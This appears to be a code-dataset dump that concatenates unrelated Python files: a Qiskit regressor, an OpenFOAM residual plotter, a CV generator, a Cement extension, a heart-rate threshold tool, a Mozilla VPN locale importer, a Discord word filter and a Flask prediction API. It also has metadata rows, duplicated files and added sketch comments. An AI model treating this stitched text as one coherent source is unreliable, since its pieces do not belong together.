# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Neural network regressor """
from typing import Union
import numpy as np
from qiskit.algorithms.optimizers import Optimizer
from ...exceptions import QiskitMachineLearningError
from ...neural_networks import NeuralNetwork
from ...utils.loss_functions import (Loss, L1Loss, L2Loss, CrossEntropyLoss,
CrossEntropySigmoidLoss)
class NeuralNetworkRegressor:
""" Quantum neural network regressor"""
def __init__(self, neural_network: NeuralNetwork,
loss: Union[str, Loss] = 'l2',
optimizer: Optimizer = None,
warm_start: bool = False):
"""
Args:
            neural_network: An instance of a quantum neural network. If the neural network has a
one-dimensional output, i.e., `neural_network.output_shape=(1,)`, then it is
expected to return values in [-1, +1] and it can only be used for binary
classification. If the output is multi-dimensional, it is assumed that the result
is a probability distribution, i.e., that the entries are non-negative and sum up
to one. Then there are two options, either one-hot encoding or not. In case of
                one-hot encoding, each probability vector resulting from a neural network is considered
as one sample and the loss function is applied to the whole vector. Otherwise, each
entry of the probability vector is considered as an individual sample and the loss
function is applied to the index and weighted with the corresponding probability.
loss: A target loss function to be used in training. Default is `l2`, i.e. L2 loss.
Can be given either as a string for 'l1', 'l2', 'cross_entropy',
'cross_entropy_sigmoid', or as a loss function implementing the Loss interface.
optimizer: An instance of an optimizer to be used in training.
warm_start: Use weights from previous fit to start next fit.
Raises:
QiskitMachineLearningError: unknown loss, invalid neural network
"""
self._neural_network = neural_network
if len(neural_network.output_shape) > 1:
raise QiskitMachineLearningError('Invalid neural network output shape!')
if isinstance(loss, Loss):
self._loss = loss
else:
if loss.lower() == 'l1':
self._loss = L1Loss()
elif loss.lower() == 'l2':
self._loss = L2Loss()
elif loss.lower() == 'cross_entropy':
self._loss = CrossEntropyLoss()
elif loss.lower() == 'cross_entropy_sigmoid':
self._loss = CrossEntropySigmoidLoss()
else:
raise QiskitMachineLearningError(f'Unknown loss {loss}!')
self._optimizer = optimizer
self._warm_start = warm_start
self._fit_result = None
@property
def neural_network(self):
""" Returns the underlying neural network."""
return self._neural_network
@property
def loss(self):
""" Returns the underlying neural network."""
return self._loss
@property
def warm_start(self) -> bool:
""" Returns the warm start flag."""
return self._warm_start
@warm_start.setter
def warm_start(self, warm_start: bool) -> None:
""" Sets the warm start flag."""
self._warm_start = warm_start
def fit(self, X: np.ndarray, y: np.ndarray): # pylint: disable=invalid-name
"""
Fit the model to data matrix X and target(s) y.
Args:
X: The input data.
y: The target values.
Returns:
            self: returns a trained regressor.
Raises:
QiskitMachineLearningError: In case of invalid data (e.g. incompatible with network)
"""
if self._neural_network.output_shape == (1,):
# TODO: we should add some reasonable compatibility checks and raise meaningful errors.
def objective(w):
predict = self._neural_network.forward(X, w)
target = np.array(y).reshape(predict.shape)
value = np.sum(self._loss(predict, target))
return value
def objective_grad(w):
# TODO should store output from forward pass (implement loss interface?)
# TODO: need to be able to turn off input grads if not needed.
output = self._neural_network.forward(X, w)
_, weights_grad = self._neural_network.backward(X, w)
grad = np.zeros((1, self._neural_network.num_weights))
for i in range(len(X)):
grad += self._loss.gradient(output[i][0], y[i]) * weights_grad[i]
return grad
else:
def objective(w):
val = 0.0
probs = self._neural_network.forward(X, w)
for i in range(len(X)):
for y_predict, prob in enumerate(probs[i]):
val += prob * self._loss(y_predict, y[i])
return val
def objective_grad(w):
num_classes = self._neural_network.output_shape[0]
grad = np.zeros((1, self._neural_network.num_weights))
for x, y_target in zip(X, y):
# TODO: do batch eval
_, weight_prob_grad = self._neural_network.backward(x, w)
for i in range(num_classes):
grad += weight_prob_grad[
0, i, :].reshape(grad.shape) * self._loss(i, y_target)
return grad
if self._warm_start and self._fit_result is not None:
initial_point = self._fit_result[0]
else:
initial_point = np.random.rand(self._neural_network.num_weights)
self._fit_result = self._optimizer.optimize(self._neural_network.num_weights, objective,
objective_grad, initial_point=initial_point)
return self
def predict(self, X: np.ndarray) -> np.ndarray: # pylint: disable=invalid-name
"""
Predict using the network specified to the regression.
Args:
X: The input data.
Raises:
QiskitMachineLearningError: Model needs to be fit to some training data first
Returns:
The predicted values.
"""
if self._fit_result is None:
raise QiskitMachineLearningError('Model needs to be fit to some training data first!')
# TODO: proper handling of batching
return self._neural_network.forward(X, self._fit_result[0])
    def score(self, X: np.ndarray, y: np.ndarray) -> float:  # pylint: disable=invalid-name
"""
Return R-squared on the given test data and targeted values.
Args:
X: Test samples.
y: True target values given `X`.
Raises:
QiskitMachineLearningError: Model needs to be fit to some training data first
Returns:
R-squared value.
"""
if self._fit_result is None:
raise QiskitMachineLearningError('Model needs to be fit to some training data first!')
predict = self.predict(X)
# Compute R2 for score
ss_res = sum(map(lambda k: (k[0] - k[1]) ** 2, zip(y, predict)))
ss_tot = sum([(k - np.mean(y)) ** 2 for k in y])
score = 1 - (ss_res / ss_tot)
if len(np.array(score).shape) > 0:
return score[0]
else:
            return score
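# --- Hedged usage sketch (not from the original file) ----------------------
# Minimal end-to-end use of NeuralNetworkRegressor on toy 1-D data. `qnn` is a
# placeholder for an already-built qiskit_machine_learning NeuralNetwork (for
# example a TwoLayerQNN); constructing one is outside this file, so it is left
# as an assumption here. COBYLA is a real optimizer in qiskit.algorithms.
#
# import numpy as np
# from qiskit.algorithms.optimizers import COBYLA
#
# X = np.linspace(-1, 1, 20).reshape(-1, 1)      # toy inputs
# y = np.sin(np.pi * X).ravel()                  # toy targets
# reg = NeuralNetworkRegressor(neural_network=qnn, loss='l2', optimizer=COBYLA(maxiter=50))
# reg.fit(X, y)
# print(reg.score(X, y))                         # R^2 on the training data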
residuals.py | fbob/mplFOAM | 8 | 8581 |
#!/usr/bin/env python
# encoding: utf-8
import sys
import getopt
import re
import os
import pylab as plt
import numpy as np
# Define the variables for which the residuals will be plotted
variables = ["Ux", "Uy", "T", "p_rgh", "k", "epsilon"]
# Get the arguments of the script
def usage():
print("Usage: residuals.py -l logfile\nPlot the residuals versus Time/Iteration")
try:
options, args = getopt.getopt(sys.argv[1:], 'l:h', ['help', 'logfile='])
except getopt.GetoptError:
usage()
sys.exit(2)
for opt, arg in options:
if opt in ("-l", "--logfile"):
log_file = arg
elif opt in ("-h", "--help"):
usage()
sys.exit(1)
# Get the lines of the logfile 'log_file'
lines = open(log_file, "r" ).readlines()
# Get the time and continuity values
time = [] # Time(s) or iterations counter
continuity = [] # Continuity values
for line in lines:
if re.search(r"^Time = ", line): # Search for string 'Time' at the begining of the line in file
start = 'Time = '
value = line.split(start)[1] # Take the Time value as the string just after start
        time.append(float(value)) # Convert the string to a float value
elif re.search(r"continuity errors :", line): # Search for string 'continuity' in the lines of file 'log_file'
start = 'sum local = '
end = ', global'
value = line.split(start)[1].split(end)[0] # Take the continuity value as string between start and end
        continuity.append(float(value)) # Convert the string to a float value
# Get the residual values for each variable
for variable in variables:
data = []
for line in lines:
if re.search(r"Solving for " + variable, line):# Search for string variable in line of file 'log_file'
start = 'Final residual = '
end = ', No Iterations'
value = line.split(start)[1].split(end)[0]
            data.append(float(value))
plt.plot(np.array(time),np.array(data), label=variable) # Plot the residual values of variable
plt.plot(np.array(time),np.array(continuity), label="Continuity") # Plot the continuity values
# Plot
plt.title("Residuals plot:\n * logfile: " + log_file + "\n * case dir: " + os.getcwd().split('/')[-1], loc='left')
plt.xlabel("Time(s)/Iterations")
plt.ylabel("Residuals (Log Scale)")
plt.yscale('log')
plt.legend()
plt.grid()
plt.show()
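# --- Hedged helper sketch (not part of the original script) ----------------
# The split-by-markers parsing used in the loops above, factored into a helper
# for a single solver-log line. The sample line in the docstring is written
# from memory of typical OpenFOAM output, not taken from a real log.
def _parse_final_residual(line):
    """E.g. 'DILUPBiCG:  Solving for Ux, ... Final residual = 0.0001, No Iterations 3' -> 0.0001"""
    return float(line.split('Final residual = ')[1].split(', No Iterations')[0])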
content_generator/vitae.py | empiricalstateofmind/personal_website | 0 | 8582 |
# Generate the vitae.json file used to populate the Vitae section of the website.
import pandas as pd
import re
from datetime import datetime
from collections import defaultdict
import json
# Publications
def create_publications(filepath):
    publications = pd.read_excel(filepath, sheet_name='publications')
publications = publications.fillna('')
publication_store = defaultdict(list)
for ix, pub in publications.iterrows():
date = pub.publication_date.strftime('%Y')
entry = {'title': pub.title,
'authors': pub.authors,
'arxiv': pub.arxiv_link,
'abstract':pub.abstract,
'date': date}
if pub.journal_link != '':
entry['link'] = pub.journal_link
if pub.journal != '':
entry['journal'] = pub.journal
publication_store[pub.type].append(entry)
return publication_store
def create_conferences(filepath):
    conferences = pd.read_excel(filepath, sheet_name='conferences')
conferences = conferences.fillna('')
categories = [('invited', 'Invited Talks \& Posters'),
('contributed', 'Contributed Talks \& Posters'),
('attended', 'Attended'),
('school', 'Schools')]
conference_store = {}
for key, subtitle in categories:
data = conferences[conferences.type == key]
collection = []
if len(data) > 0:
for ix, conf in data.iterrows():
if conf.include=='no': continue
date = conf.timestamp.strftime('%b. %Y')
if key in ['attended', 'school']:
contribution = 'Attendee'
else:
contribution = "{} {}".format(conf.type.capitalize(), conf.medium.capitalize())
entry = {'title':conf.title,
'location':conf.location,
'date':date,
'contribution': contribution,
}
if conf.link != '':
entry['link'] = conf.link
if (conf.presentation_title != '') & (conf.presentation_authors != ''):
entry['presentation_authors'] = conf.presentation_authors
entry['presentation_title'] = conf.presentation_title
collection.append(entry)
conference_store[key] = collection
return conference_store
def create_teaching(filepath):
    teaching = pd.read_excel(filepath, sheet_name='teaching')
teaching = teaching.fillna('')
teaching_store = []
for ix, teach in teaching.sort_values(by='type').iterrows():
if teach['type'] == 'supervision':
entry = {
'date': teach.date,
'project_award': teach.program,
'title': teach.title,
'student': teach.student_name,
'institution': teach.location
}
teaching_store.append(entry)
return teaching_store
def create_reviewing(filepath):
    reviewing = pd.read_excel(filepath, sheet_name='journals')
reviewing = reviewing.fillna('')
review_store = []
for ix, review in reviewing.iterrows():
entry = {'name': review.journal_name,
'short_name': review.journal_shortname}
review_store.append(entry)
return review_store
if __name__ == "__main__":
# FILEPATH = "D:/Dropbox/projects/personal_cv/vitae.xlsx" # We can pass this as an argument later
FILEPATH = "../../../Projects/personal_cv/vitae.xlsx"
vitae = {'publications':create_publications(FILEPATH),
'conferences':create_conferences(FILEPATH),
'teaching':create_teaching(FILEPATH),
'reviewing':create_reviewing(FILEPATH)}
with open('../app/mod_home/static/vitae.json', 'w') as file:
json.dump(vitae, file, sort_keys=True, indent=4)
with open('../app/static/vitae.json', 'w') as file:
        json.dump(vitae, file, sort_keys=True, indent=4)
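# --- Hedged sketch (not part of the original script) -----------------------
# The loaders above assume an Excel workbook with sheets named 'publications',
# 'conferences', 'teaching' and 'journals'. A throwaway workbook exercising
# create_publications() could be built like this; the column names are
# inferred from the attribute accesses above, the values are made up.
def make_dummy_workbook(path='dummy_vitae.xlsx'):
    columns = ['title', 'authors', 'arxiv_link', 'abstract',
               'publication_date', 'journal', 'journal_link', 'type']
    frame = pd.DataFrame([{
        'title': 'A Paper', 'authors': 'A. Author', 'arxiv_link': '',
        'abstract': '', 'publication_date': pd.Timestamp('2020-01-01'),
        'journal': '', 'journal_link': '', 'type': 'journal',
    }], columns=columns)
    with pd.ExcelWriter(path) as writer:
        frame.to_excel(writer, sheet_name='publications', index=False)
    return path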
cement/ext/ext_generate.py | tomekr/cement | 826 | 8583 | """
Cement generate extension module.
"""
import re
import os
import inspect
import yaml
import shutil
from .. import Controller, minimal_logger, shell
from ..utils.version import VERSION, get_version
LOG = minimal_logger(__name__)
class GenerateTemplateAbstractBase(Controller):
class Meta:
pass
def _generate(self, source, dest):
msg = 'Generating %s %s in %s' % (
self.app._meta.label, self._meta.label, dest
)
self.app.log.info(msg)
data = {}
# builtin vars
maj_min = float('%s.%s' % (VERSION[0], VERSION[1]))
data['cement'] = {}
data['cement']['version'] = get_version()
data['cement']['major_version'] = VERSION[0]
data['cement']['minor_version'] = VERSION[1]
data['cement']['major_minor_version'] = maj_min
f = open(os.path.join(source, '.generate.yml'))
yaml_load = yaml.full_load if hasattr(yaml, 'full_load') else yaml.load
g_config = yaml_load(f)
f.close()
vars = g_config.get('variables', {})
exclude_list = g_config.get('exclude', [])
ignore_list = g_config.get('ignore', [])
# default ignore the .generate.yml config
g_config_yml = r'^(.*)[\/\\\\]%s[\/\\\\]\.generate\.yml$' % \
self._meta.label
ignore_list.append(g_config_yml)
var_defaults = {
'name': None,
'prompt': None,
'validate': None,
'case': None,
'default': None,
}
for defined_var in vars:
var = var_defaults.copy()
var.update(defined_var)
for key in ['name', 'prompt']:
assert var[key] is not None, \
"Required generate config key missing: %s" % key
val = None
if var['default'] is not None and self.app.pargs.defaults:
val = var['default']
elif var['default'] is not None:
default_text = ' [%s]' % var['default']
else:
default_text = '' # pragma: nocover
if val is None:
class MyPrompt(shell.Prompt):
class Meta:
text = "%s%s:" % (var['prompt'], default_text)
default = var.get('default', None)
p = MyPrompt()
val = p.prompt() # pragma: nocover
if var['case'] in ['lower', 'upper', 'title']:
val = getattr(val, var['case'])()
elif var['case'] is not None:
self.app.log.warning(
"Invalid configuration for variable " +
"'%s': " % var['name'] +
"case must be one of lower, upper, or title."
)
if var['validate'] is not None:
assert re.match(var['validate'], val), \
"Invalid Response (must match: '%s')" % var['validate']
data[var['name']] = val
try:
self.app.template.copy(source, dest, data,
force=self.app.pargs.force,
ignore=ignore_list,
exclude=exclude_list)
except AssertionError as e:
if re.match('(.*)already exists(.*)', e.args[0]):
raise AssertionError(e.args[0] + ' (try: --force)')
else:
raise # pragma: nocover
def _clone(self, source, dest):
msg = 'Cloning %s %s template to %s' % (
self.app._meta.label, self._meta.label, dest
)
self.app.log.info(msg)
if os.path.exists(dest) and self.app.pargs.force is True:
shutil.rmtree(dest)
elif os.path.exists(dest):
msg = "Destination path already exists: %s (try: --force)" % dest
raise AssertionError(msg)
shutil.copytree(source, dest)
def _default(self):
source = self._meta.source_path
dest = self.app.pargs.dest
if self.app.pargs.clone is True:
self._clone(source, dest)
else:
self._generate(source, dest)
def setup_template_items(app):
template_dirs = []
template_items = []
# look in app template dirs
for path in app._meta.template_dirs:
subpath = os.path.join(path, 'generate')
if os.path.exists(subpath) and subpath not in template_dirs:
template_dirs.append(subpath)
# use app template module, find it's path on filesystem
if app._meta.template_module is not None:
mod_parts = app._meta.template_module.split('.')
mod = mod_parts.pop()
try:
mod = app.__import__(mod, from_module='.'.join(mod_parts))
mod_path = os.path.dirname(inspect.getfile(mod))
subpath = os.path.join(mod_path, 'generate')
if os.path.exists(subpath) and subpath not in template_dirs:
template_dirs.append(subpath)
# FIXME: not exactly sure how to test for this so not covering
except AttributeError: # pragma: nocover
            msg = 'unable to load template module ' + \
'%s from %s' % (mod, '.'.join(mod_parts)) # pragma: nocover
app.log.debug(msg) # pragma: nocover
for path in template_dirs:
for item in os.listdir(path):
if item not in template_items:
template_items.append(item)
class GenerateTemplate(GenerateTemplateAbstractBase):
class Meta:
label = item
stacked_on = 'generate'
stacked_type = 'nested'
help = 'generate %s from template' % item
arguments = [
# ------------------------------------------------------
(['dest'],
{'help': 'destination directory path'}),
# ------------------------------------------------------
(['-f', '--force'],
{'help': 'force operation if destination exists',
'dest': 'force',
'action': 'store_true'}),
# ------------------------------------------------------
(['-D', '--defaults'],
{'help': 'use all default variable values',
'dest': 'defaults',
'action': 'store_true'}),
# ------------------------------------------------------
(['--clone'],
{'help': 'clone this template to destination path',
'dest': 'clone',
'action': 'store_true'}),
]
source_path = os.path.join(path, item)
app.handler.register(GenerateTemplate)
class Generate(Controller):
class Meta:
label = 'generate'
stacked_on = 'base'
stacked_type = 'nested'
config_section = 'generate'
def _setup(self, app):
super(Generate, self)._setup(app)
def _default(self):
self._parser.print_help()
def load(app):
app.handler.register(Generate)
    app.hook.register('pre_run', setup_template_items)
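# --- Hedged example (not part of the original module) ----------------------
# Sketch of the .generate.yml file that _generate() above parses: each entry
# under 'variables' supplies the required name/prompt keys plus the optional
# validate/case/default keys, and 'ignore'/'exclude' are lists of regexes.
# The field names mirror the code above; the concrete values are invented.
EXAMPLE_GENERATE_YML = """\
variables:
  - name: app_label
    prompt: Application label
    validate: "^[a-z][a-z0-9_]*$"
    case: lower
    default: myapp
exclude: []
ignore: []
"""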
ditto/core/__init__.py | Kvoti/ditto | 0 | 8584 | from . import forms
from . import views
ADMIN_ROLE = "Administrator"
MEMBER_ROLE = "Member"
GUEST_ROLE = "Guest"
DEFAULT_ROLES = [ADMIN_ROLE, MEMBER_ROLE, GUEST_ROLE]
training_stats/hrm.py | salwator/training_stats | 4 | 8585 | from .gpxfile import get_hr_measurements
from .utils import interpolate
from operator import itemgetter
def __calculate_moving_sums(points, window):
""" Calculates hr moving sums of the window len """
time, hrs = zip(*points)
moving_sum = sum(hrs[0:window])
sums = [(time[0], moving_sum)]
for i, t in enumerate(time[1:-1 * window]):
moving_sum += hrs[i + window] - hrs[i]
sums.append((t, moving_sum))
return sums
def calculate_lactate_threshold(hrdata):
""" Given list of (time, hr), returns lactate threshold and selected data"""
test_period = 60 * 30 # test time
measured_period = 60 * 20 # measured period in seconds
hrs = interpolate(hrdata)
time_stamp, max_sum = max(__calculate_moving_sums(hrs, test_period),
key=itemgetter(1))
# your lactate threshold is average of last 20 in 30 minutes of tempo run
start_measure = time_stamp + (test_period - measured_period)
stop_measure = start_measure + measured_period
measured_time, measured_hrs = zip(*hrs[start_measure:stop_measure])
lactate_thr = round(sum(measured_hrs) / measured_period)
    return (lactate_thr, measured_time, measured_hrs)
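# --- Hedged usage sketch (not part of the original module) -----------------
# Synthetic 40-minute ride sampled once per second, so the 30-minute test
# window and the final 20-minute measurement window both fit. This assumes
# interpolate() (imported above) returns one (second, hr) pair per second,
# which is what the position-based slicing in calculate_lactate_threshold
# appears to expect. In the real package the samples would come from
# get_hr_measurements(gpx_file).
def _demo_lactate_threshold():
    ride = [(second, 140 + second // 300) for second in range(40 * 60)]
    threshold, _, _ = calculate_lactate_threshold(ride)
    return threshold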
scripts/utils/import_languages.py | mozilla-releng/staging-mozilla-vpn-client | 0 | 8586 | #! /usr/bin/env python3
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import argparse
import xml.etree.ElementTree as ET
import os
import sys
import shutil
import atexit
import subprocess
# Use the project root as the working directory
prevdir = os.getcwd()
workdir = os.path.join(os.path.dirname(__file__), '..', '..')
os.chdir(workdir)
atexit.register(os.chdir, prevdir)
# Include only locales above this threshold (e.g. 70%) in production
l10n_threshold = 0.70
parser = argparse.ArgumentParser()
parser.add_argument(
'-m', '--macos', default=False, action="store_true", dest="ismacos",
help='Include the MacOS bundle data')
parser.add_argument(
'-q', '--qt_path', default=None, dest="qtpath",
help='The QT binary path. If not set, we try to guess.')
args = parser.parse_args()
stepnum = 1
def title(text):
global stepnum
print(f"\033[96m\033[1mStep {stepnum}\033[0m: \033[97m{text}\033[0m")
stepnum = stepnum+1
# Step 0
title("Find the Qt localization tools...")
def qtquery(qmake, propname):
try:
qtquery = os.popen(f'{qmake} -query {propname}')
qtpath = qtquery.read().strip()
if len(qtpath) > 0:
return qtpath
finally:
pass
return None
qtbinpath = args.qtpath
if qtbinpath is None:
qtbinpath = qtquery('qmake', 'QT_INSTALL_BINS')
if qtbinpath is None:
qtbinpath = qtquery('qmake6', 'QT_INSTALL_BINS')
if qtbinpath is None:
qtbinpath = qtquery('qmake5', 'QT_INSTALL_BINS')
if qtbinpath is None:
qtbinpath = qtquery('qmake-qt5', 'QT_INSTALL_BINS')
if qtbinpath is None:
print('Unable to locate qmake tool.')
sys.exit(1)
if not os.path.isdir(qtbinpath):
print(f"QT path is not a diretory: {qtbinpath}")
sys.exit(1)
lupdate = os.path.join(qtbinpath, 'lupdate')
lconvert = os.path.join(qtbinpath, 'lconvert')
lrelease = os.path.join(qtbinpath, 'lrelease')
# Step 0
# Let's update the i18n repo
os.system(f"git submodule init")
os.system(f"git submodule update --remote --depth 1 i18n")
# Step 1
# Go through the i18n repo, check each XLIFF file and take
# note which locale is complete above the minimum threshold.
# Adds path of .xliff and .ts to l10n_files.
title("Validate the XLIFF file...")
l10n_files = []
for locale in os.listdir('i18n'):
# Skip non folders
if not os.path.isdir(os.path.join('i18n', locale)):
continue
# Skip hidden folders
if locale.startswith('.'):
continue
xliff_path = os.path.join('i18n', locale, 'mozillavpn.xliff')
# If it's the source locale (en), ignore parsing for completeness and
# add it to the list.
if locale == 'en':
print(f'OK\t- en added (reference locale)')
l10n_files.append({
'locale': 'en',
'ts': os.path.join('translations', 'generated', 'mozillavpn_en.ts'),
'xliff': xliff_path
})
continue
tree = ET.parse(xliff_path)
root = tree.getroot()
sources = 0
translations = 0
for element in root.iter('{urn:oasis:names:tc:xliff:document:1.2}source'):
sources += 1
for element in root.iter('{urn:oasis:names:tc:xliff:document:1.2}target'):
translations += 1
completeness = translations/(sources*1.0)
# Ignore locale with less than 70% of completeness
if completeness < l10n_threshold:
print(f'KO\t- {locale} is translated at {round(completeness*100, 2)}%, at least {l10n_threshold*100}% is needed')
continue # Not enough translations next file please
print(f'OK\t- {locale} added ({round(completeness*100, 2)}% translated)')
l10n_files.append({
'locale': locale,
'ts': os.path.join('translations', 'generated', f'mozillavpn_{locale}.ts'),
'xliff': xliff_path
})
# Step 2
title("Create folders and localization files for the languages...")
for file in l10n_files:
locdirectory = os.path.join('translations', 'generated', file['locale'])
os.makedirs(locdirectory, exist_ok=True)
locversion = os.path.join(locdirectory, f'locversion.plist')
with open(locversion, 'w') as locversion_file:
locversion_file.write(f"""<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\"
\"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">
<plist version=\"1.0\">
<dict>
<key>LprojCompatibleVersion</key>
<string>123</string>
<key>LprojLocale</key>
<string>{file['locale']}</string>
<key>LprojRevisionLevel</key>
<string>1</string>
<key>LprojVersion</key>
<string>123</string>
</dict>
</plist>""")
with open(os.path.join('translations', 'generated', 'macos.pri'), 'w') as macospri:
macospri.write('### AUTOGENERATED! DO NOT EDIT!! ###\n')
for file in l10n_files:
macospri.write(f"LANGUAGES_FILES_{file['locale']}.files += $$PWD/{file['locale']}/locversion.plist\n")
macospri.write(f"LANGUAGES_FILES_{file['locale']}.path = Contents/Resources/{file['locale']}.lproj\n")
macospri.write(f"QMAKE_BUNDLE_DATA += LANGUAGES_FILES_{file['locale']}\n\n")
# Step 3
title("Write resource file to import the locales that are ready...")
with open('translations/generated/translations.qrc', 'w') as qrcfile:
qrcfile.write('<!-- AUTOGENERATED! DO NOT EDIT!! -->\n')
qrcfile.write('<RCC>\n')
qrcfile.write(' <qresource prefix="/i18n">\n')
for file in l10n_files:
qrcfile.write(f' <file>mozillavpn_{file["locale"]}.qm</file>\n')
qrcfile.write(' </qresource>\n')
qrcfile.write('</RCC>\n')
# Step 4
title("Generate the Js/C++ string definitions...")
try:
subprocess.call([sys.executable, os.path.join('scripts', 'utils', 'generate_strings.py'),
'-o', os.path.join('translations', 'generated'),
os.path.join('translations', 'strings.yaml')])
except Exception as e:
print("generate_strings.py failed. Try with:\n\tpip3 install -r requirements.txt --user")
print(e)
exit(1)
# Build a dummy project to glob together everything that might contain strings.
title("Scanning for new strings...")
def scan_sources(projfile, dirpath):
projfile.write(f"HEADERS += $$files({dirpath}/*.h, true)\n")
projfile.write(f"SOURCES += $$files({dirpath}/*.cpp, true)\n")
projfile.write(f"RESOURCES += $$files({dirpath}/*.qrc, true)\n\n")
with open('translations/generated/dummy.pro', 'w') as dummyproj:
dummyproj.write('### AUTOGENERATED! DO NOT EDIT!! ###\n')
dummyproj.write(f"HEADERS += l18nstrings.h\n")
dummyproj.write(f"SOURCES += l18nstrings_p.cpp\n")
dummyproj.write(f"SOURCES += ../l18nstrings.cpp\n\n")
for l10n_file in l10n_files:
dummyproj.write(f"TRANSLATIONS += {os.path.basename(l10n_file['ts'])}\n")
dummyproj.write("\n")
scan_sources(dummyproj, '../../src')
scan_sources(dummyproj, '../../nebula')
# Step 5
title("Generate translation resources...")
for l10n_file in l10n_files:
os.system(f"{lconvert} -if xlf -i {l10n_file['xliff']} -o {l10n_file['ts']}")
os.system(f"{lupdate} translations/generated/dummy.pro")
for l10n_file in l10n_files:
os.system(f"{lrelease} -idbased {l10n_file['ts']}")
print(f'Imported {len(l10n_files)} locales')
git = os.popen(f'git submodule status i18n')
git_commit_hash = git.read().strip().replace("+","").split(' ')[0]
print(f'Current commit: https://github.com/mozilla-l10n/mozilla-vpn-client-l10n/commit/{git_commit_hash}')
cogs/filter.py | Velgaster/Discord-User-Vote | 0 | 8587 | from discord.ext import commands
import discord
def setup(client):
client.add_cog(KeyWordFilter(client))
class KeyWordFilter(commands.Cog):
def __init__(self, client):
self.client = client
self.log_ch = self.client.get_channel(int(self.client.SETTINGS.LOG_CHANNEL))
@commands.Cog.listener()
async def on_message(self, msg):
if any(x in msg.content.split() for x in self.client.SETTINGS.BLACKLIST):
ctx = await self.client.get_context(msg)
await self.event_log(ctx, msg, "A blacklisted phrase was used!")
await msg.delete()
async def event_log(self, ctx, msg, event):
embed = discord.Embed()
embed.colour = discord.Colour.red()
embed.title = event
embed.add_field(name='User', value=msg.author, inline=True)
embed.add_field(name='Channel', value=msg.channel.name, inline=True)
embed.add_field(name='Message', value=f"> {msg.content}", inline=False)
await self.log_ch.send(embed=embed)
| from discord.ext import commands
import discord
def setup(client):
client.add_cog(KeyWordFilter(client))
class KeyWordFilter(commands.Cog):
def __init__(self, client):
self.client = client
self.log_ch = self.client.get_channel(int(self.client.SETTINGS.LOG_CHANNEL))
@commands.Cog.listener()
async def on_message(self, msg):
if any(x in msg.content.split() for x in self.client.SETTINGS.BLACKLIST):
ctx = await self.client.get_context(msg)
await self.event_log(ctx, msg, "A blacklisted phrase was used!")
await msg.delete()
async def event_log(self, ctx, msg, event):
embed = discord.Embed()
embed.colour = discord.Colour.red()
embed.title = event
embed.add_field(name='User', value=msg.author, inline=True)
embed.add_field(name='Channel', value=msg.channel.name, inline=True)
embed.add_field(name='Message', value=f"> {msg.content}", inline=False)
await self.log_ch.send(embed=embed)
| none | 1 | 2.389588 | 2 |
|
api/app.py | sai-krishna-msk/KickAssist | 0 | 8588 | <gh_stars>0
from ml_model.model import KickModel
import numpy as np
import pandas as pd
import eli5
import joblib
import flask
from flask import Flask, render_template, request, jsonify
app = Flask(__name__)
model_oh = joblib.load('ml_model/estimators/model_oh.sav')
model_hel = joblib.load('ml_model/estimators/model_hel.sav')
encoder_oh = joblib.load('ml_model/estimators/encoder_oh.sav')
encoder_hel = joblib.load('ml_model/estimators/encoder_hel.sav')
encoder_label = joblib.load('ml_model/estimators/encoder_label.sav')
def get_predict(launch_date , deadline_date , goal , subcategory , category , currency , country , description, rewards):
pred_dict={
"launched_at":launch_date,
"deadline":deadline_date,
"goal":int(goal),
"sub_category":subcategory,
"category":category,
"currency":currency,
"location_country":country,
"blurb":description,
"rewards":[]
}
try:
for reward in rewards.split(","):
pred_dict["rewards"].append(int(reward))
except Exception as e:
raise Exception(f"Error sanatizing rewards with {e} error")
return pred_dict
@app.route('/predict/<launch_date>/<deadline_date>/<goal>/<subcategory>/<category>/<currency>/<country>/<description>/<rewards>')
def GetURL(launch_date , deadline_date , goal , subcategory , category , currency , country , description, rewards):
pred_dict = get_predict(launch_date , deadline_date , goal , subcategory , category , currency , country , description, rewards)
obj = KickModel(model_oh , model_hel , encoder_oh , encoder_hel , encoder_label)
obj.load_data(pred_dict)
obj.pred()
oh_pred = float(obj.pred_oh[0][1])
hel_pred = float(obj.pred_hel[0][1])
response = {
"prediction_oh":oh_pred,
"prediction_hel":hel_pred,
"prediction_oh_df":obj.pred_oh_intr.to_dict(),
"prediction_hel_intr":obj.pred_hel_intr.to_dict()
}
return response
if __name__=="__main__":
app.run(debug =True) | from ml_model.model import KickModel
import numpy as np
import pandas as pd
import eli5
import joblib
import flask
from flask import Flask, render_template, request, jsonify
app = Flask(__name__)
model_oh = joblib.load('ml_model/estimators/model_oh.sav')
model_hel = joblib.load('ml_model/estimators/model_hel.sav')
encoder_oh = joblib.load('ml_model/estimators/encoder_oh.sav')
encoder_hel = joblib.load('ml_model/estimators/encoder_hel.sav')
encoder_label = joblib.load('ml_model/estimators/encoder_label.sav')
def get_predict(launch_date , deadline_date , goal , subcategory , category , currency , country , description, rewards):
pred_dict={
"launched_at":launch_date,
"deadline":deadline_date,
"goal":int(goal),
"sub_category":subcategory,
"category":category,
"currency":currency,
"location_country":country,
"blurb":description,
"rewards":[]
}
try:
for reward in rewards.split(","):
pred_dict["rewards"].append(int(reward))
except Exception as e:
raise Exception(f"Error sanatizing rewards with {e} error")
return pred_dict
@app.route('/predict/<launch_date>/<deadline_date>/<goal>/<subcategory>/<category>/<currency>/<country>/<description>/<rewards>')
def GetURL(launch_date , deadline_date , goal , subcategory , category , currency , country , description, rewards):
pred_dict = get_predict(launch_date , deadline_date , goal , subcategory , category , currency , country , description, rewards)
obj = KickModel(model_oh , model_hel , encoder_oh , encoder_hel , encoder_label)
obj.load_data(pred_dict)
obj.pred()
oh_pred = float(obj.pred_oh[0][1])
hel_pred = float(obj.pred_hel[0][1])
response = {
"prediction_oh":oh_pred,
"prediction_hel":hel_pred,
"prediction_oh_df":obj.pred_oh_intr.to_dict(),
"prediction_hel_intr":obj.pred_hel_intr.to_dict()
}
return response
if __name__=="__main__":
app.run(debug =True) | none | 1 | 2.687813 | 3 |
|
